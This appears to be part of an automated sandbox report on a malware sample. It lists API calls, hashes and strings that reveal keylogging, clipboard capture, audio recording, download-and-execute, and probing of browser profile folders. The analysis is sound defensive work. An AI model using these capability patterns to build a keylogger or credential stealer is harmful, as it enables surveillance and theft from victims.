                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
                    • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleReadSize
                    • String ID:
                    • API String ID: 3919263394-0
                    • Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                    • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                    • Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                    • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                    APIs
                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandleOpenProcess
                    • String ID:
                    • API String ID: 39102293-0
                    • Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                    • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                    • Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                    • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                    APIs
                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                      • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                    • _UnwindNestedFrames.LIBCMT ref: 00439891
                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                    • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                    • String ID:
                    • API String ID: 2633735394-0
                    • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                    • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                    • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                    • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                    APIs
                    • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                    • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                    • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                    • GetSystemMetrics.USER32(0000004F), ref: 00419402
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: MetricsSystem
                    • String ID:
                    • API String ID: 4116985748-0
                    • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                    • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                    • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                    • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                    APIs
                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                      • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                    • String ID:
                    • API String ID: 1761009282-0
                    • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                    • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                    • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                    • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorHandling__start
                    • String ID: pow
                    • API String ID: 3213639722-2276729525
                    • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                    • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                    • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                    • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                    APIs
                    • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F0F
                    • GetLastError.KERNEL32 ref: 00449F2B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharErrorLastMultiWide
                    • String ID: PkGNG
                    • API String ID: 203985260-263838557
                    • Opcode ID: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                    • Instruction ID: 5218313022fb824330162c1b3e1e252a07855a0508c927524b2412b0d5c8e50b
                    • Opcode Fuzzy Hash: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                    • Instruction Fuzzy Hash: A531F831600205EBEB21EF56C845BAB77A8DF55711F24416BF9048B3D1DB38CD41E7A9
                    APIs
                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                    • __Init_thread_footer.LIBCMT ref: 0040B797
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Init_thread_footer__onexit
                    • String ID: [End of clipboard]$[Text copied to clipboard]
                    • API String ID: 1881088180-3686566968
                    • Opcode ID: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                    • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                    • Opcode Fuzzy Hash: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                    • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                    APIs
                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ACP$OCP
                    • API String ID: 0-711371036
                    • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                    • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                    • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                    • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                    APIs
                    • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
                    • GetLastError.KERNEL32 ref: 0044B804
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFileLastWrite
                    • String ID: PkGNG
                    • API String ID: 442123175-263838557
                    • Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                    • Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
                    • Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                    • Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68
                    APIs
                    • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
                    • GetLastError.KERNEL32 ref: 0044B716
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFileLastWrite
                    • String ID: PkGNG
                    • API String ID: 442123175-263838557
                    • Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                    • Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
                    • Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                    • Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64
                    APIs
                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                    Strings
                    • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocalTime
                    • String ID: KeepAlive | Enabled | Timeout:
                    • API String ID: 481472006-1507639952
                    • Opcode ID: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
                    • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                    • Opcode Fuzzy Hash: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
                    • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                    APIs
                    • Sleep.KERNEL32 ref: 00416640
                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: DownloadFileSleep
                    • String ID: !D@
                    • API String ID: 1931167962-604454484
                    • Opcode ID: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                    • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                    • Opcode Fuzzy Hash: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                    • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                    APIs
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: alarm.wav$hYG
                    • API String ID: 1174141254-2782910960
                    • Opcode ID: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
                    • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                    • Opcode Fuzzy Hash: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
                    • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                    APIs
                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • CloseHandle.KERNEL32(?), ref: 0040B0B4
                    • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                    • String ID: Online Keylogger Stopped
                    • API String ID: 1623830855-1496645233
                    • Opcode ID: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                    • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                    • Opcode Fuzzy Hash: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                    • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                    APIs
                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: String
                    • String ID: LCMapStringEx$PkGNG
                    • API String ID: 2568140703-1065776982
                    • Opcode ID: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                    • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                    • Opcode Fuzzy Hash: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                    • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                    APIs
                    • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                    • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: wave$BufferHeaderPrepare
                    • String ID: XMG
                    • API String ID: 2315374483-813777761
                    • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                    • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                    • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                    • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                    APIs
                    • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocaleValid
                    • String ID: IsValidLocaleName$JD
                    • API String ID: 1901932003-2234456777
                    • Opcode ID: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                    • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                    • Opcode Fuzzy Hash: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                    • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                    APIs
                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                    • API String ID: 1174141254-4188645398
                    • Opcode ID: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                    • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                    • Opcode Fuzzy Hash: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                    • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                    APIs
                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                    • API String ID: 1174141254-2800177040
                    • Opcode ID: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                    • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                    • Opcode Fuzzy Hash: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                    • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                    APIs
                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: AppData$\Opera Software\Opera Stable\
                    • API String ID: 1174141254-1629609700
                    • Opcode ID: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                    • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                    • Opcode Fuzzy Hash: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                    • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                    APIs
                    • GetKeyState.USER32(00000011), ref: 0040B64B
                      • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                      • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                      • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                      • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                      • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                    • String ID: [AltL]$[AltR]
                    • API String ID: 2738857842-2658077756
                    • Opcode ID: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                    • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                    • Opcode Fuzzy Hash: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                    • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                    APIs
                    • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                    • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: uD
                    • API String ID: 0-2547262877
                    • Opcode ID: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                    • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                    • Opcode Fuzzy Hash: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                    • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$FileSystem
                    • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                    • API String ID: 2086374402-949981407
                    • Opcode ID: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                    • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                    • Opcode Fuzzy Hash: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                    • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell
                    • String ID: !D@$open
                    • API String ID: 587946157-1586967515
                    • Opcode ID: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                    • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                    • Opcode Fuzzy Hash: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                    • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                    APIs
                    • ___initconout.LIBCMT ref: 0045555B
                      • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30
                    • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleCreateFileWrite___initconout
                    • String ID: PkGNG
                    • API String ID: 3087715906-263838557
                    • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                    • Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
                    • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                    • Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759
                    APIs
                    • GetKeyState.USER32(00000012), ref: 0040B6A5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: State
                    • String ID: [CtrlL]$[CtrlR]
                    • API String ID: 1649606143-2446555240
                    • Opcode ID: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                    • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                    • Opcode Fuzzy Hash: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                    • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                    APIs
